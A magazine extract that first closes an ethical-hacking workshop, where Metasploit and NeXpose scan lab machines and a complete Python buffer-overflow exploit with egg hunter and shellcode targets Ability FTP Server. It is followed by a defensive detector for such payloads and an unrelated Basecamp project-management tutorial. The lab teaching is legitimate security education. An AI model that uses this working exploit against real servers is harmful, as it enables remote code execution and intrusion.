and Nessus as vulnerability scanners by integrating these scanners with it.
Exploitation
Once you have performed all of these tasks, the actual time for hacking into a network or system
comes into play: you exploit the vulnerability and then gain access to the victim (exploited)
machine. This is called exploitation of vulnerabilities.
How would this be achieved?
Answer: This is achieved with the Metasploit Framework, if an exploit for the vulnerability is
available in Metasploit.
What if the exploit is not available in the Metasploit Framework?
Answer: If you are a security professional and know how to use Metasploit for exploit
development, you should develop the exploit using Metasploit or other tools and then write a
Metasploit module for your discovered vulnerability. Once you have this, add the newly developed module
to the Metasploit Framework.
Real Time Hacking
By this stage you should have the virtual lab ready to perform the hacking attempts and to develop
a Metasploit Framework module for your own discovered vulnerability.
Lab Design
You should have a couple of virtual machines running in your virtual lab, and we recommend that you set up
the vulnerable machine created by Rapid7; it is called Metasploitable and is available for free on their website.
For this module, we will be using victim machines running the following operating systems:
• Metasploitable Linux
• Ubuntu OS
• Windows XP
• Windows 2008
Kali Linux, configured in the previous module with NeXpose and Metasploit, will be our hacking platform.
We will perform hacking with the tools mentioned in this workshop and would like to cover as much
as possible, virtually.
Information Gathering
Metasploit Console
Run information gathering via the Metasploit Framework by performing port scanning with “nmap”.
To perform this scan, first check database connectivity as shown below:
Now run the “nmap” scan using the “db_nmap” command so that the scan results are saved in the Metasploit
database.
Because we launched a full scan to discover all the required information, including ports,
services and operating systems, it will take a bit of time. In the snapshot below you can see
“nmap” busy performing vulnerability checks with its scripting engine.
Once “nmap” finishes the scan, you should be able to see the results in the database using the commands
shown in the snapshot below.
You should be able to discover all the hosts in the network range provided for the scan and detect their
operating systems. To see the ports and services running on these hosts, run the
“services” command, as shown in the snapshot below.
At this stage of our hacking attempt we have all the information including:
• Live Systems
• Operating System Information
• Open Ports
• Services Running
• Service Versions
What you need now is vulnerability discovery. For this you should use NeXpose as a vulnerability scanner
to perform this activity. You can run NeXpose scan by simply running the scan from the command line
of Metasploit, as well as by using the web portal of NeXpose. This module will cover both methods.
NeXpose Scan from Metasploit Console
Load the NeXpose module and then list the available commands as shown below.
NeXpose Connection
First, establish connectivity with the NeXpose scanner using the “nexpose_connect” command.
Once connected, you can also check details of the system running NeXpose, as shown below. This is useful
when you have multiple scanners.
You can now execute a scan against the hosts discovered by the “nmap” scan you performed. NeXpose will
run the vulnerability scan against those hosts using the commands shown below.
You can use the options shown in the snapshot above. In the lab for this module, the scan was launched
with the following options; you can also see the output of the scan in the snapshot below:
While NeXpose is busy running the scan, let’s log in via the web portal and see it there too. Log in with the
credentials you used during the NeXpose installation, as covered in previous modules.
The scan launched via the Metasploit console is seen in the snapshot above, as viewed via web access.
Further information on the scan is also shown below.
Once the scan is finished, you should be able to see the results in the vulnerability section, as shown below.
You can see the same results via the Metasploit command line, but in raw format, using the “vulns”
command as shown in the snapshot below.
We used the search switch to look for all “mysql” vulnerabilities discovered in this scan.
So far in this module, you have practiced the “Ethical Hacking” methodology you studied earlier; now
it’s time to complete the hacking attempts by exploiting the vulnerabilities. This workshop will exploit
selected vulnerabilities; you should review the report and the discovered vulnerabilities in detail to gain more
knowledge and understanding of the ethical hacking lifecycle.
Exploiting Vulnerabilities
Among the discovered vulnerabilities, the ones selected for this exercise are as follows.
1. Ability FTP Server on Windows
2. Apache on Linux
As shown in the snapshot above, a NeXpose scan was launched again separately for the Windows machine,
and the scan results are shown below. Among the discovered vulnerabilities, the Golden FTP bug was selected
to demonstrate exploitation in order to hack into the Windows machine.
Hacking into Windows Machine
We exploited the Ability FTP Server with our own exploit written in Python; if you want
to learn more about this, please complete the workshop “Advanced Exploitation Techniques”. Below is the
exploit code we wrote. Shortly you will learn how to develop your own Metasploit Framework module
for this exploit.
import socket
import struct

# junk data equal in size to the offset detected at 968 bytes, after which EIP is overwritten
junk = b"\x41" * 1000
# we subtracted 32 bytes from the original offset because we add our 32-byte egg_hunter code
junk1 = b"\x41" * 936
# NOPs to clean up any garbage values on the stack -- this is called padding and it's very effective
nops = b"\x90" * 26
# egg hunter created with mona.py with tag w00t
egg_hunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg_hunter += b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# stack address to jump to
retaddress = b"\x99\xC0\x96\x7C"
# Stage 2 shellcode, which is actually the larger shellcode to be executed by our egg hunter code
buf = b""
buf += b"\xdb\xdc\xd9\x74\x24\xf4\xba\xda\x88\x04\xa1\x5e\x2b"
buf += b"\xc9\xb1\x56\x31\x56\x18\x03\x56\x18\x83\xc6\xde\x6a"
buf += b"\xf1\x5d\x36\xe3\xfa\x9d\xc6\x94\x73\x78\xf7\x86\xe0"
buf += b"\x08\xa5\x16\x62\x5c\x45\xdc\x26\x75\xde\x90\xee\x7a"
buf += b"\x57\x1e\xc9\xb5\x68\xae\xd5\x1a\xaa\xb0\xa9\x60\xfe"
buf += b"\x12\x93\xaa\xf3\x53\xd4\xd7\xfb\x06\x8d\x9c\xa9\xb6"
buf += b"\xba\xe1\x71\xb6\x6c\x6e\xc9\xc0\x09\xb1\xbd\x7a\x13"
buf += b"\xe2\x6d\xf0\x5b\x1a\x06\x5e\x7c\x1b\xcb\xbc\x40\x52"
buf += b"\x60\x76\x32\x65\xa0\x46\xbb\x57\x8c\x05\x82\x57\x01"
buf += b"\x57\xc2\x50\xf9\x22\x38\xa3\x84\x34\xfb\xd9\x52\xb0"
buf += b"\x1e\x79\x11\x62\xfb\x7b\xf6\xf5\x88\x70\xb3\x72\xd6"
buf += b"\x94\x42\x56\x6c\xa0\xcf\x59\xa3\x20\x8b\x7d\x67\x68"
buf += b"\x48\x1f\x3e\xd4\x3f\x20\x20\xb0\xe0\x84\x2a\x53\xf5"
buf += b"\xbf\x70\x3c\x3a\xf2\x8a\xbc\x54\x85\xf9\x8e\xfb\x3d"
buf += b"\x96\xa2\x74\x98\x61\xc4\xaf\x5c\xfd\x3b\x4f\x9d\xd7"
buf += b"\xff\x1b\xcd\x4f\x29\x23\x86\x8f\xd6\xf6\x09\xc0\x78"
buf += b"\xa8\xe9\xb0\x38\x18\x82\xda\xb6\x47\xb2\xe4\x1c\xfe"
buf += b"\xf4\x2a\x44\x53\x93\x4e\x7a\x74\x67\xc6\x9c\x10\x77"
buf += b"\x8e\x37\x8c\xb5\xf5\x8f\x2b\xc5\xdf\xa3\xe4\x51\x57"
buf += b"\xaa\x32\x5d\x68\xf8\x11\xf2\xc0\x6b\xe1\x18\xd5\x8a"
buf += b"\xf6\x34\x7d\xc4\xcf\xdf\xf7\xb8\x82\x7e\x07\x91\x74"
buf += b"\xe2\x9a\x7e\x84\x6d\x87\x28\xd3\x3a\x79\x21\xb1\xd6"
buf += b"\x20\x9b\xa7\x2a\xb4\xe4\x63\xf1\x05\xea\x6a\x74\x31"
buf += b"\xc8\x7c\x40\xba\x54\x28\x1c\xed\x02\x86\xda\x47\xe5"
buf += b"\x70\xb5\x34\xaf\x14\x40\x77\x70\x62\x4d\x52\x06\x8a"
buf += b"\xfc\x0b\x5f\xb5\x31\xdc\x57\xce\x2f\x7c\x97\x05\xf4"
buf += b"\x8c\xd2\x07\x5d\x05\xbb\xd2\xdf\x48\x3c\x09\x23\x75"
buf += b"\xbf\xbb\xdc\x82\xdf\xce\xd9\xcf\x67\x23\x90\x40\x02"
buf += b"\x43\x07\x60\x07"
# arranging the stack: filler + egg hunter fill the 968 bytes up to EIP,
# then the return address, then a short jump back into the egg hunter
myStage1 = junk1 + egg_hunter
myStage1 += retaddress + b"\xEB\xC4"
# stage 2 is tagged with the doubled egg so the hunter can find it in memory
myStage2 = b"w00tw00t" + nops + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.81.140", 21))  # hardcoded IP address of the host running Ability Server
s.recv(1024)
s.send(b"USER ftp" + b"\r\n")  # log in with ftp as user
s.recv(1024)
s.send(b"PASS ftp" + b"\r\n")  # authenticate with ftp as password
s.recv(1024)
s.send(b"APPE " + myStage1 + myStage2 + b"\r\n")  # evil buffer
s.recv(1024)
s.send(b"QUIT\r\n")
s.close()
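As an added defender-side example (not code from the workshop), the following Python checker flags FTP control-channel commands that carry the buffer layout the exploit above uses: an oversized APPE argument, a long single-byte filler run, a NOP sled, a doubled egg tag and raw non-printable bytes. The sample session, the placeholder bytes standing in for the egg hunter and shellcode, and the thresholds are all constructed here, not taken from the page's lab.

```python
import re
import string

# Heuristic thresholds (assumptions for this example, not values from the page)
MAX_SANE_ARG_LEN = 255      # FTP path arguments in real sessions are far shorter than this
MIN_FILLER_RUN = 64         # a long run of one byte = offset filler such as "A" * 936
NOP_SLED = b"\x90" * 8      # eight consecutive x86 NOP bytes
NONPRINT_RATIO = 0.05       # fraction of non-printable bytes that marks raw shellcode
PRINTABLE = frozenset(string.printable.encode())

FILLER_RUN_RE = re.compile(rb"(.)\1{63,}", re.DOTALL)            # 64+ identical bytes
EGG_TAG_RE = re.compile(rb"(?P<tag>[0-9A-Za-z]{4})(?P=tag)")      # doubled 4-byte egg tag


def analyze_ftp_command(raw):
    """Score one FTP control-channel command line.

    Strong indicators (oversized argument, NOP sled, non-printable bytes) score 2,
    weak ones (filler run, doubled tag) score 1; a total of 2 or more is suspicious.
    """
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    score = 0
    reasons = []

    if len(arg) > MAX_SANE_ARG_LEN:
        score += 2
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_SANE_ARG_LEN))
    if NOP_SLED in arg:
        score += 2
        reasons.append("NOP sled (8+ consecutive 0x90 bytes)")
    if arg:
        nonprint = sum(1 for b in arg if b not in PRINTABLE)
        if nonprint / len(arg) > NONPRINT_RATIO:
            score += 2
            reasons.append("%d non-printable bytes in argument" % nonprint)
    if FILLER_RUN_RE.search(arg):
        score += 1
        reasons.append("run of %d+ identical bytes (offset filler)" % MIN_FILLER_RUN)
    for m in EGG_TAG_RE.finditer(arg):
        if len(set(m.group("tag"))) > 1:   # skip tags that are merely part of a filler run
            score += 1
            reasons.append("doubled egg-hunter tag %r" % m.group("tag"))
            break

    return {
        "verb": verb.upper().decode("ascii", "replace"),
        "arg_len": len(arg),
        "score": score,
        "suspicious": score >= 2,
        "reasons": reasons,
    }


def scan_session(lines):
    """Return the flagged commands of a session, each with its position in the session."""
    findings = []
    for index, raw in enumerate(lines):
        verdict = analyze_ftp_command(raw)
        if verdict["suspicious"]:
            verdict["index"] = index
            findings.append(verdict)
    return findings


# Constructed malicious argument mirroring the layout of the exploit above: 936 bytes of
# filler, 32 placeholder bytes where the egg hunter would sit, a placeholder return address
# and short jump, then the egg tag, a NOP sled and placeholder stage-2 bytes (no real shellcode).
MALICIOUS_ARG = (
    b"A" * 936
    + b"\xcc" * 32
    + b"\xef\xbe\xad\xde"
    + b"\xeb\xfe"
    + b"w00tw00t"
    + b"\x90" * 26
    + b"\xcc" * 64
)

# Constructed FTP control-channel session (not captured from the page's lab)
SAMPLE_SESSION = [
    b"USER ftp\r\n",
    b"PASS ftp\r\n",
    b"APPE reports/q1_summary.docx\r\n",
    b"APPE " + MALICIOUS_ARG + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print("command %d (%s, %d-byte argument): %s"
              % (f["index"], f["verb"], f["arg_len"], "; ".join(f["reasons"])))
```

Only the fourth command is flagged; the benign APPE with a normal path scores zero, so a single weak indicator such as a doubled tag in a file name never raises an alert by itself.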
Now, to import this as a module into Metasploit, we first fuzz the Ability server with our Python
fuzzer and then use Immunity Debugger to generate the Metasploit exploit code, which we customize
for our use. The fuzzing steps are shown sequentially in the snapshots below, in which the FTP server was fuzzed
and then “mona.py” was used to generate the Metasploit code for us.
You can find the exploit module in the Immunity directory; the initial code looks like the listing below.
You should now customize the details you consider mandatory based on the vulnerability discovery;
in particular, you can customize the information section of this module and then import it into the Metasploit
Framework by copying the module into the directory shown below. Name the module
so you can easily find it in a search; in this case, we will name it “ralab_ability.rb”.
Before you add this module to the Metasploit Framework, note down the exploit count as shown in the
snapshot below; the total number of exploits available in Metasploit is 1409.
Copy the module you have just created into the directory shown in the snapshot below.
Now run the “reload_all” command on the Metasploit console; this reloads all modules, after which you should
check the exploit count.
The number should be one more than the previous total number of exploits; in our case,
it incremented to 1410, as shown below.
Now search for your exploit in the Metasploit Framework; search for “ralab” and you should
see the exploit available, as shown below:
Use this exploit to hack into the Windows machine running Ability Server; however, you need to customize
the exploit and add the mandatory requirements, such as the “register” function options for the login/password
used by the exploit, and set up the buffer space. Alternatively, you can use the already customized exploit available
in the Metasploit Framework to hack into the Windows machine.
Hacking Linux Machine
In Metasploit Framework, we looked for the “PHP CGI Argument Injection Vulnerability” as shown below.
We set the target to our Linux Machine on 192.168.81.138 and exploited this bug.
And very easily we got the Meterpreter session.
We hope this has been informative for you and we would like to thank you for completing this workshop.
About the Author
Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT
Founder of 26Securelabs, an Information Security consulting company. Raheel is an expert in information
security with 9+ years in the domain of infosec.
Basecamp – Project Management for the Sane
by Troy Hipolito
ISO Interactive is an award-winning consultancy that builds engaging mobile and web experiences. Known for
small to large opportunities using Unity, Flash, HTML5 and traditional web programming, they have built
very cool virtual worlds, 3D simulations, mobile apps, social games and web designs.
Overview
In this tutorial, we will dive into a basic understanding of Basecamp (a project management tool we use), as
well as learn how to get up to speed quickly so that you can start realizing the benefits of the program, among
which are centralizing communications, reducing the frequency of meetings, facilitating team coordination on
projects, and providing transparency on timelines.
We have more detailed information on the project management role and the methods that work
best for your organization in my previous article, located at: http://sdjournal.org/download/2011-pentestextra-issues/.
Feel free to check it out, as it has good information on project management organization and methods.
Speaking of which, project management is one area in which we have a lot of experience. We believe project management
is a major factor in determining the success of a project. This is especially true for complex and technical
endeavors.
Now, I am not taking anything away from great designers and developers, but having them is more the norm.
Great designers and developers need unification and sometimes direction to keep goals, budgets and
timelines reasonable.
Our groups have worked in corporate as well as agency scenarios. To be honest, we favor the agency style,
as it has more of a startup feel and allows us to get our hands dirty. This gives us some control to drive tasks
and better target success.
Corporate project management, in our view, is more about reporting to a number of bosses than actual management.
It’s different due to the structure and size of the client/partner.
The good people at 37signals have revamped their popular project management software Basecamp.
Previously we produced a popular project management article for the Software Developer’s Journal that
touches on the old version of the software. More specifically, it is the cover article for the Flash & Flex
magazine in 2011.
So we have actually touched on some of that information but now we will concentrate on an in-depth tutorial
of the new version of Basecamp.
This tutorial is divided into several sections, starting with the basic Why Basecamp?, followed
by a description of the various features and capabilities of Basecamp. The third section will cover
usage instructions and guidelines, from identifying project scope to replying to Basecamp Messages.
The final section covers the conclusion.
Why Basecamp?
You may be wondering why we use Basecamp rather than another tool.
Well, we actually do use other tools depending on the client/partner/requirements. There are many great
online tools out there, for example Jira, MS Project, Asana and RallyDev. Some of these are more feature
rich with true Agile processes, while others have a very specific set of functions.
At ISO the main focus is to produce a high quality product with the least amount of drama. That may not
sound completely intuitive, but if you think about it, everything is about making things flow and reducing
drama. Controlling costs is actually a byproduct.
The best designers and developers are sometimes a pain in the butt (not all, but most). You know what I’m
talking about: acting like they just hit puberty, not making their deadlines (that they committed to), getting
their feelings hurt easily, whining, crying and all that nonsense. And they have to be managed without them
pooping their pants and walking out of the job because they aren’t doing what they said or aren’t getting
their way. My goodness, it is a pain to manage, but absolutely needed.
While generally we “try” to adopt more agile processes, we are bound by the rapid changing needs of the
business, which can grow in volume at a rapid pace. Our focus is directed by numerous initiatives that result
in a compound of projects with a pairing of unique groups. Planning projects around Agile-style “sprints”
(i.e., a guaranteed amount of time) is not always possible and more often not probable.
Basecamp is often more suitable for many of our needs because it is task-oriented and date-driven. Another
great benefit of Basecamp is it’s an entirely online secure desktop tool. Basecamp also offers a mobile app.
Additional highlights the program offers:
• Centralizing communication for emails based on the project, conversation thread and assigned tasks.
• Uploading and tagging files associated with a particular project. Typically, these are items like word
documents, spreadsheets, images, PSDs and PDFs.
• Setting up and tracking schedules for development, meetings, and handoffs.
The key to success when using Basecamp is for everyone to actually use it for the tasks at hand. Otherwise,
there will not be a record of any tasks being worked on. This can easily degenerate into halting progression
to the next step of the project, delays in securing approvals and handing off to other departments, and
failure to meet deadlines. In short, not properly communicating within Basecamp about your project tasks
can jeopardize launch dates.
So think of Basecamp as a handy organization tool that allows your team to be more efficient and
enhances productivity.
On to our review of Basecamp!
The following are the six (6) main sections found under the Projects Menu in Basecamp:
• Projects
• Calendar
• Everything
• Progress
• Everyone
• Me
Projects Menu
When you log in to Basecamp, you are directed to the main page, where you are able to see all of the
projects available. From here you can select the project you want, change the view of how you want to see
projects, “star” projects that pertain to you, and even create new projects via a template or from scratch.
On this page there is also a little search box that allows you to find things quickly.
There are a number of projects in the queue at any given time. To find a particular project, simply scroll
up or down until you find what you need. You’ll also have the option to change the view from “graphical” to
“hybrid” to “textual” by using the icons on the left of the screen (below the New Project link). If you like
to read through the list quickly, you may want to use the “textual” view.
If you want to group the projects which are specifically assigned to you, simply click on the “star” for those
projects and they will all be moved up together to the top.
Additionally, if you want to look for a project that you know is finished but can’t find the name, click the
archived projects link on the top right to see a listing of those projects.
Individual Project “Project Name”
Each project has a number of components. Clicking on a project, you will notice menu links/sub sections
for Project Landing Page, Discussions, To-dos, Files, Text Documents and Events.
Project Landing Page
The title of the project is the link to the project landing page. These pages are useful for viewing recent
activity in the other subsections. From top to bottom it shows the latest project updates, Discussions, To-do
lists, a visual of the Files uploaded and the newest Text Documents.
All content from these subsections displayed on the project landing page links directly to those details.
Next, let’s take a look at the definition of most of these titles.
Discussions
Discussions serve as a type of “centralized” email inbox. Typically, Discussions are not directly tied to to-dos.
They are used for emails which may deal with internal approvals and general notes that may or may not
pertain to current tasks. Each discussion can have its own thread. For example, “discussions” can be used to
post project notes.
Starting a Discussion
To start a discussion, log in to your Basecamp project and click on the post a new message button. There you have
the Subject line and the message area. You can format with the tools available and, if needed, upload a file.
Make sure you DO NOT email everyone. No one likes spam. Please only click on the individuals that need
to know. There is more on this and other etiquette items in the How We Use Basecamp section.
Once they receive a Basecamp message, individuals can simply email back from their native email client
or click the “view on Basecamp” link within the email to reply. Viewing from Basecamp will allow the entire
conversation thread to be reviewed. Lastly, you can attach files as needed in discussions.
To-do lists
To-dos are a vital part of Basecamp. They are what generates the Calendar, assigns tasks to individuals and
denotes important events. It is basically an adjustable task list with due dates.
Within the following image there is an Add a to-do list button, the title of a current To-do list and individual
to-dos/tasks. On the right side are the view options (show assigned to, show when due, show
completed, and individual to-do lists).
Basecamp allows for numerous lists. Typically, depending on the type and size of the project, you may want
to break it up. At this time, however, our projects are fairly small, so we prefer a more linear
approach. It is simpler for our current needs.
The previous image displays individual to-dos that can have a few pieces of additional information.
Normally it has a description, due date and the person the task is assigned to. If there are any comments
relating to this to-do task, you will see a note following the to-do task description.
Once the to-do task is completed, the assigned person or Project Manager can check it off (with the check button).
In order to view a comment, just click on it. Comments are very good if the short description does not have
enough detail.
However, for our projects we add some additional info. In each of our to-do items we have the subject
(e.g. Comps), short description, percentage complete, date or date range, separate due date and the person the
task is assigned to.
In the example below, the original description was reduced to UX > set 1. In this case, we added comments
for further clarification.
Selecting on a to-do task (that has comments) will display all the comments in a thread fashion. This is very
similar to how the message conversations are done. The viewer will also be able to select to whom to email the
message. The purpose is to have the person assigned to be responsive regarding the progress of their task and
to centralize related conversations. Only conversations that pertain to this to-do task should be added here.
There is also an option to email people outside of Basecamp who are not part of the project. However, that is
not recommended for our production flow.
Once individuals receive a message, they can simply reply via their email client or from Basecamp.
It is usually better to email back via Basecamp if you feel that you want to read part or the entire thread.
Going back to the additional info we added, let’s talk about the percentage item (e.g. [30%]). This info can
be added manually in Basecamp by the person performing the task, as well as by the project manager. This is
done by moving your cursor over the to-do task and then selecting the “edit” option.
This allows everyone to quickly see how much of the task is considered completed. Formatting it this way
also has some major advantages. That piece of information, along with the due date, is pulled into a visual
Gantt chart/timeline called TeamGantt.
Gantt Chart
This is separate online software that is very useful for visual teams. And the project manager can invite
the same people on the project from Basecamp to TeamGantt.
TeamGantt uses the percentage info provided to show completion of the task. The beginning and end dates
in the to-do task description are just a reference so we can visually adjust the timeline. But adding the time
range in the textual format makes it easy to read, and that is the important thing.
TeamGantt also has some neat printing features, associating tasks with each other and even color coding
groups of tasks.
As such, if designing comps is dependent on wireframes, you can link them together visually. In this case,
I have made all the comp-related items a fuchsia, or “hot pink”, color. So all the comp-driven tasks are one
color, UX-related ones another color, and so on.
A couple of other neat features allow the Project Managers or individuals with edit permissions to send notes
to the tasks from both Basecamp and TeamGantt. It is just a little option that helps get things done quickly.
Calendar
For the most part the Calendar is pretty self-explanatory. There are some automatic things it provides, as well
as features that can be used. Below is a screenshot.
To the left of the screenshot, the Calendar shows all the events relating to the projects you are involved with.
Be aware that the complete view is on by default, and it may become too much information unless you turn
off projects you are not focusing on.
If that is the case, just click the little colored circle with the check mark in order to turn the visibility
of the related tasks on or off in the calendar. What you see in the larger portion of the calendar are all
the to-dos posted by due date. A user can also use this to check off work. Besides the normal To-do items,
individuals can also add their own entries and associate them with any accessible project. These, however,
do not create a to-do item but, rather, only create a calendar event. Our group uses Google Calendar, so we
may not use this as often. However, it may be useful to add events if it helps to keep track of events on an
individual basis. The following image shows how to create an event. You can add an event by clicking
on any of the calendar days. You can add the event’s title and additional notes to the desired calendar,
and you can even adjust the event to span multiple days if needed and then email your colleagues.
Everything
“Everything” is an easy way to browse all items in their respective groups. This section has Browse every
discussion, Review all open to-dos, See every single file, Read all text documents, Show all forwarded emails
and See all deleted items.
These are just other ways to find information quickly.
To provide a quick breakdown:
• Browse every discussion > Provides a listing of any/all textual updates in the order they were added.
You can click to get to that discussion and associated project by selecting it.
• Review all open to-dos > Provides access to all the to-dos (that you have access to) that have not been
checked off. Again, you can just link to the exact to-do within the project by clicking on any of the items
on the page.
• See every single file > Provides access to all uploaded files for all the projects to which you have access.
Useful if you have a lot of projects and you want to have an overview of all uploaded files, etc.
• Read all text documents > Shows all documents based on the last update.
• Show all forwarded emails > For emails that have responses from outside of Basecamp. We probably
will not have a need for this.
• See all deleted items > Anything that has been deleted. This is also not used very often.
Progress
Shows who did what in the order it happened. This comes in very handy when you want to find out any
activity of the last few days. Beyond that it may present too much info. The Progress section also gives
a good indication of who is using Basecamp and how.
You can scroll down, review the messages, files and happenings in real time.
Everyone
This section shows everyone, with the most recently active individuals posted first.
You can see everyone by clicking the “See all people” link on the bottom left of the screen.
Incidentally, “admins” can add additional people, change access permissions and perform other
administrative functions.
Me
The “Me” section can be very helpful to quickly see everything on your plate. It provides access to all the latest
activity across all your projects, all your open to-dos, recently completed to-dos and files you have shared.
This should actually be the first place you go in the morning to see if it lines up with what you know
needs to happen.
How We Use Basecamp (Usage Guidelines)
This is so important we made it a major section in the article. Proper etiquette comes into play when we
think of how our actions affect the team and timelines. Basecamp is pretty much an open system; we can
use it the way we like. We as a group need to form and follow a sort of protocol or “etiquette” which will
help everything start making sense and become more of a natural process.
This process should include “when” and “how” we use Basecamp communications, as well as where
information should be located. Basecamp is not a perfect tool by far. It is up to everyone to use and tweak it
as needed. At the same time, if we do not report to it, then the information will not be available for everyone
else. An added advantage of properly and effectively using the system is that it will actually help reduce the
need for some of the meetings and allow you to complete your work.
The rules of today may be switched later for something that makes more sense. But for now these are
the general usage guidelines.
Identifying Your Tasks
Tasks can be anything including replying to messages, reviewing documents, identifying dates and, yes,
especially to-dos.
One of the things we have to keep in mind is to look out for each other. If you notice that there are tasks
missing that will prevent you from doing your work (or dates that do not seem appropriate) then please
let everyone else know. It probably has to be addressed.
So, where do we start?
• First go to the “Me” menu link. There you can see what tasks are assigned to you.
This does not give you a clear priority but it does show you all things you are associated with.
If you know there are tasks or projects that you have to do work on and it is not there, find out why.
If it is not on Basecamp then others may not know it exists. Basecamp should be used as transparently
as possible so others can quickly see how the project is going without the need for much interaction.
Basecamp is designed to show you and others where you are at in the process of your projects.
• Secondly (and this is optional): START POINT project is a good place to go to, as there is a to-do list
called Priorities. There you can find your name and make notes on your goals for the day in order of
importance. Creating this priority list helps you focus on items needed. And we all know the focus
can change at any moment. So feel free to update that to-do item for any updates.
• Once you are focused for the day, it is best to dive into the individual project you are working on.
Based on the priority list you have created, go to the project you have to work on.
Identifying project scope and important files and links
Even after you have reviewed the project and your to-do’s, do not overlook the possibility that there are
times when there may be context missing on the project or you may need access to some particular bit of
additional information. This could be a reference info, a “what the heck is this project about,” a list of who
is on it, or information on how to get access to the needed file(s).
It may just be that you need more details on the actual to-do/task...
Formatting explanation of the to-dos schedule
To make the to-dos a little more precise and at the same time keep the amount of content readable, we have implemented a subject formatting technique to assist in this matter.
As we mentioned before, the to-dos are tasks that can be also arranged as a schedule (view section 1.3
for general details on to-do’s). This subsection, however, is really designed to break down why we format
it the way we do.
Please note that not all to-do items may be formatted this way. However, if you have a series of tasks that
form a schedule, then it is best to use these practices. To simplify the different styles let’s call these series
of tasks (to-do schedules) and non-series of tasks (one-offs or similar tasks).
To illustrate the point the images that follow are 2 different views of the same series of tasks. The first image
is what you see from Basecamp, while the second is a more visual timeline generated in TeamGantt.
Series of tasks
Basecamp view. Most projects that require a series of tasks are broken up in usable chunks. They tend to
include most of the larger events, but often meetings spring up for additional reviews or issues that are not
related to the project.
You can see this project is a little more complicated than most, but the basic structure is pretty standard.
Typically, most projects have:
• BO (Business Owner) ZIP and CB (Creative Brief). In the example below it was already completed
and checked off.
• Internal kick-off. Again, this already happened and has been checked off.
• UX development
• Content support
• Comps
• Internal reviews (sometimes these are not listed as the dates shift too often)
• Legal reviews
• IT Release
• UAT prep
• IT Dev
• UAT internal testing
• Launch
As you will notice, the following image has multiple releases. Sometimes this is needed if you are dividing
design and development/IT groups. Dev/IT may have to get started on a project overlapping the design
schedule in order to make launch dates.
Now that we have an idea of the different groupings, let’s consider formatting. If you take another look at the
series of tasks shown above, you will notice that some have “++” in front of them and others do not.
• The “++” prefix generally represents a release or major meeting. These are what we call non-tasks
or things that do not require the online group to develop.
Items without the “++” prefix generally represent design of UX, content creation or comp designing.
• You will also notice that we use the overarching subject first. So you may read things like UX, Content
or Comps. Then you will notice a little arrow like this “>”. After that a small amount of detail (just
enough to understand what is being worked on).
• After the detail you will often see a date or date range. For events that take one day, a simple date is
needed, while for events spanning a period of time it is good to just put the date in the description. This is
important because Basecamp only tracks end dates. We want to show the start and end dates.
• After the date or date range you may see a percentage in brackets like this – [50%]. This is manually filled
out so we get an idea on where this task is in the process. It is also auto-translated visually in the Gantt chart
in TeamGantt. And if the description is a bit vague, that is why you add a comment to it. That way anyone
looking at this particular to-do can see that there is a comment which can be clicked on to drill down and
see additional details.
• Then the task is assigned to someone and given a due date. You may be curious why there is a date range
and a due date. For starters, while due dates are tracked in the system, we format these dates visually
to make it easier to read and identify start dates.
Also TeamGantt has start dates as well as end dates. It is easier to adjust the start in TeamGantt once you
can actually read the date ranges in the description.
So let’s use this example and break it down.
Comps > set 1 > see comments > 8/12 – 8/15 [0%] 1 comment Person Name Mon Aug 11
• Comps = Overall subject.
• set 1 = Short detail.
• see comments = A note signifying that more details on the task are to be found in the comments.
• 8/12 – 8/15 = Start and end date (note we will probably have several internal approval meetings in between
these dates that may or may not be notated on the schedule).
• [0%] = The estimated percentage of the task completion.
• 1 comment = Shows how many comments are associated with this task.
• Person Name Mon Aug 11 = Who is assigned (and defaults emails to), and when that task is due.
TeamGantt project is just pulling the Basecamp information, providing a visual reference of the time it takes
to complete a task (start and end date), a visual percentage of completion, and some of the same tools that
Basecamp has.
To simplify, the Project Managers generally set up the permissions for TeamGantt to be “view only.” This
is so individuals do not have to try to adjust things from there. But the Project Managers do have the ability
to create messages and tasks from there if they choose (or need) to.
The Project Managers also try to color-code 4 different types of tasks:
• Non-tasks (the ones with the “++” prefix): a default powder blue
• UX: light orange
• Content: orange-red
• Comps: a hot pink/fuchsia color.
In the previous graphic you will notice that a few UX tasks are 95% done. The timeline item for each of those
tasks is actually 95% full. This is a visual indicator of where the task is.
Non-series set of tasks
The following image is an example of a non-series set of tasks. These are things like one-offs or recurring tasks.
Non-series tasks are usually simple, yet where possible they still explain things using the subject-first type of
formatting.
When to use regular email vs. Basecamp messages/to-dos
There are lots of messages that do not have to be tracked or which don’t specifically pertain to a task. If this
is the case, you don’t have to use Basecamp. You will have to decide if you want the message to be seen by
others or not.
We try to streamline whenever possible but also communicate enough to complete the tasks and “asks” at hand.
These are some examples of what not to post on Basecamp: “Hi John – how was your weekend?”, “I did
not like the meeting and thought it was a bad idea” or “I am concerned I committed to a deadline I cannot
reach.” These are examples of messages or personal conversations that should be handled outside of Basecamp.
Also, if we are emailing other people outside of Basecamp, we should just use an email. They will not know
what the email is if it is coming from the Basecamp system.
Replying to Basecamp messages/to-dos
One obstacle we tend to run across is that we do not always have an understanding that a Basecamp-generated email is an email that requests a reply. If emails are not acknowledged then it can have an adverse
effect when trying to finish projects in a timely manner. As such:
• Always direct the email to the main person when applicable.
For example: If you are sending out a message and have selected several individuals to receive it, please
direct the message to the individuals by adding the @ symbol followed by the person’s name. It will end up
looking something like this: @Jon.
That way, once they receive the email, the first thing they will see is who the email is focused on.
• Please reply to Basecamp emails.
• Please start conversations on to-dos and messages on Basecamp (when appropriate).
For more information about general usage of Basecamp messages and to-dos please view sections 2.2 and 2.3.
Conclusion
Basecamp is a tool to allow us to centralize conversations, help build and maintain task-driven timelines.
It can also be integrated with a number of other tools like TeamGantt, which allows us to visually see the
timelines (beginning to end), percentage of items completed, certain print features and just allows the online
group to quickly stay on track.
Although Basecamp is a great tool to have, it only works well when people are consciously using it in
a productive manner. This is a flexible system that requires a little manual work to keep things running
smoothly. Just remember, you can also take a peek at the online help section where there are guides, videos
